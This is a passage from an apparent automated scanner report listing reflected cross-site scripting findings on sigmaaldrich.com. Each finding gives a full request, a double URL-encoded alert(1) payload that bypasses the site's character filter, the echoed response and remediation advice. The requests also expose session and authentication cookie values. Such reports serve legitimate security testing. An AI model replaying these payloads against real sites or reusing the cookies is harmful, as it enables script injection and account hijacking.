Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:41 GMT
Content-Length: 28961
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/images28ad3";alert(1)//6747eed535d/online-catalog/new-icon","E404") ;
   </script>
...[SNIP]...

1.466. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/online-catalog/new-icon [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/online-catalog/new-icon

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e804b%2522%253balert%25281%2529%252f%252f1b669119b0f was submitted in the REST URL parameter 5. This input was echoed as e804b";alert(1)//1b669119b0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/images/online-cataloge804b%2522%253balert%25281%2529%252f%252f1b669119b0f/new-icon HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:43 GMT
Content-Length: 28961
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/images/online-cataloge804b";alert(1)//1b669119b0f/new-icon","E404") ;
   </script>
...[SNIP]...

1.467. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/online-catalog/new-icon [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/online-catalog/new-icon

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ffcec%2522%253balert%25281%2529%252f%252f2bd679ffa16 was submitted in the REST URL parameter 6. This input was echoed as ffcec";alert(1)//2bd679ffa16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich/images/online-catalog/new-iconffcec%2522%253balert%25281%2529%252f%252f2bd679ffa16 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:45 GMT
Content-Length: 28961
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/sigma-aldrich/images/online-catalog/new-iconffcec";alert(1)//2bd679ffa16","E404") ;
   </script>
...[SNIP]...

1.468. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/white-bar.Par.0001.Image [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/white-bar.Par.0001.Image

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5da26%2522%253balert%25281%2529%252f%252f2b9b7bea53e was submitted in the REST URL parameter 1. This input was echoed as 5da26";alert(1)//2b9b7bea53e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc5da26%2522%253balert%25281%2529%252f%252f2b9b7bea53e/medialib/sigma-aldrich/images/white-bar.Par.0001.Image HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:36 GMT
Content-Length: 28962
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc5da26";alert(1)//2b9b7bea53e/medialib/sigma-aldrich/images/white-bar.Par.0001.Image","E404") ;
   </script>
...[SNIP]...

1.469. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/white-bar.Par.0001.Image [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/white-bar.Par.0001.Image

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 976e7%2522%253balert%25281%2529%252f%252f94d8812d8e3 was submitted in the REST URL parameter 2. This input was echoed as 976e7";alert(1)//94d8812d8e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib976e7%2522%253balert%25281%2529%252f%252f94d8812d8e3/sigma-aldrich/images/white-bar.Par.0001.Image HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:39 GMT
Content-Length: 28962
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib976e7";alert(1)//94d8812d8e3/sigma-aldrich/images/white-bar.Par.0001.Image","E404") ;
   </script>
...[SNIP]...

1.470. http://www.sigmaaldrich.com/etc/medialib/sigma-aldrich/images/white-bar.Par.0001.Image [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/sigma-aldrich/images/white-bar.Par.0001.Image

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6dbc9%2522%253balert%25281%2529%252f%252f713ae4d73e was submitted in the REST URL parameter 3. This input was echoed as 6dbc9";alert(1)//713ae4d73e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/sigma-aldrich6dbc9%2522%253balert%25281%2529%252f%252f713ae4d73e/images/white-bar.Par.0001.Image HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
